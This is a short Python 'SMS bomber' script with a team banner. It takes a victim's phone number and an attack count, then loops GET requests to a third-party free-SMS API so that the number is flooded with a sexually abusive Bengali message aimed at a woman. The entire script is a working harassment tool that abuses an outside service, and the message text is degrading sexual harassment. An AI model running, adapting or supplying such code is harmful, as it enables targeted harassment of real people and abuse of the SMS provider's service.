import requests

green = '\033[1;32m'
end = '\033[0m'
print (green+"""  _ _______ _                                                    
 (_)__   __( )                                                   
  _   | |  |/ ____                                               
 | |  | |    |_  /                                               
 | |  | |     / /                                                
 |_|_ |_|____/___|_             _______                          
  / /  / ____(_|_) |           |__   __|                         
 | |  | (___  _ _| |     ___ _ __ | |                            
 | |   \___ \| | | |    / _ \ '_ \| |                            
 | |   ____) | | | |___|  __/ | | | |                            
 | |  |_____/|_|_|______\___|_| |_|_|                            
  \_\  _          _______                                        
 | |  | |        |__   __|                                       
 | |__| |_   _ _ __ | | ___ _ __                                 
 |  __  | | | | '_ \| |/ _ \ '__|                                
 | |  | | |_| | | | | |  __/ |                                   
 |_|__|_|\__,_|_| |_|_|\___|_|                                   
 |__   __|       |  \/  | \ \                                    
    | | ___  __ _| \  / |  | |                                   
    | |/ _ \/ _` | |\/| |  | |                                   
    | |  __/ (_| | |  | |  | |                                   
    |_|\___|\__,_|_|  |_|  | |                                   
   _____             _____/_/                                    
  / ____|           |__   __|                                    
 | |     _ __ ___  __ _| | ___  _ __                             
 | |    | '__/ _ \/ _` | |/ _ \| '__|                            
 | |____| | |  __/ (_| | | (_) | |                               
  \_____|_|  \___|\__,_|_|\___/|_|                               
  |  _ \                                                         
  | |_) |_   _                                                   
  |  _ <| | | |                                                  
  | |_) | |_| |                                                  
  |____/ \__, |                                                  
          __/ |                                                  
   __  _ |___/_____         _____ _    _       _  ___ ____   __  
  / / | |  | |  __ \       / ____| |  | |     | |/ (_)  _ \  \ \ 
 | |  | |__| | |  | |_____| (___ | |__| | __ _| ' / _| |_) |  | |
 | |  |  __  | |  | |______\___ \|  __  |/ _` |  < | |  _ <   | |
 | |  | |  | | |__| |      ____) | |  | | (_| | . \| | |_) |  | |
 | |  |_|  |_|_____/      |_____/|_|  |_|\__,_|_|\_\_|____/   | |
  \_\_                                                       /_/ 
  ( _ )                                                          
  / _ \/\                                                        
 | (_>  <                                                        
  \___/\/   _ _____             _  ____    __     __ __          
  / / | |  | |  __ \           | |/ __ \   \ \   / / \ \         
 | |  | |__| | |  | |______    | | |  | |_ _\ \_/ /   | |        
 | |  |  __  | |  | |______|   | | |  | | '_ \   /    | |        
 | |  | |  | | |__| |     | |__| | |__| | | | | |     | |        
 | |  |_|  |_|_____/       \____/ \____/|_| |_|_|     | |        
  \_\                                                /_/         
                                                                 """+end)
                                                                 
                             
# CVALUE
blue = '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
print ("\033[32m")

print ("	 -!-!- WeLcOmE-!-!- (SiiLenT HunTer TeaM ) ")
                                    
number  = str(input("[>] Heii Mr : JOny Sir. MitHu MaGir NumBer DiN: "))
amount = int(input("[>] Sir apNar aTTack ar PoriMaN LikHuN: "))

url = "http://crux.bongobd.com:80/api/SMS/SendFreeSMS?msisdn=88"+number+"&sms=2TK-ar%20%20PepSi-%20%20%20MitHu%20%20MaGii%20%20ONNek%20%20SexY-%20Turr%20aMMurr%20%20SHoNarE%20%20aMii%20%20cHuDii%20%20%20kHanKii%20%20%20ShOna%20%20BecHOnii%20%20MaGii&sc=16443"


for i in range(amount):
	
	resp = requests.get(url)

	print(str(i+1)+" aTTack By JOny")
	

